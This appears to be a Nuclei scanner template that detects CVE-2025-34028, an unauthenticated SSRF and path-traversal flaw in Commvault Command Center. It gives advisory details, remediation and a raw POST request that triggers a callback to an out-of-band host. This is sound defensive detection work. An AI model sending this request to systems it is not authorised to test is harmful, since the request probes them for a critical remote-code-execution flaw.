id: CVE-2025-34028

info:
  name: Commvault - SSRF via /commandcenter/deployWebpackage.do
  author: DhiyaneshDk,abhishekrautela
  severity: critical
  description: |
    A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.
  impact: |
    Unauthenticated attackers can exploit SSRF through ZIP file uploads containing path traversal sequences, potentially leading to remote code execution on the Commvault server.
  remediation: |
    Apply the security patch as described in Commvault's security advisory for Command Center Innovation Release 11.38.
  reference:
    - https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
    - https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-34028
    cwe-id: CWE-22
    epss-score: 0.69328
    epss-percentile: 0.98665
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="1209838013"
  tags: cve,cve2025,ssrf,oast,commvault,kev,vkev,vuln

variables:
  string: "{{to_lower(rand_base(5))}}"

http:
  - raw:
      - |
        POST /commandcenter/deployWebpackage.do HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        commcellName={{interactsh-url}}&servicePack={{string}}&version=x

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 900'
        condition: and
# digest: 4a0a00473045022100ce5b67e344fd9d1fd2e326110a92b847b3eb551a114f775bcf54f5decb4e60d1022074aaaa0494ab3da0bec97c35cbc6fbcf52b4d90af928bf8c7068a0988e0c2ad0:922c64590222798bb761d5b6d8e72950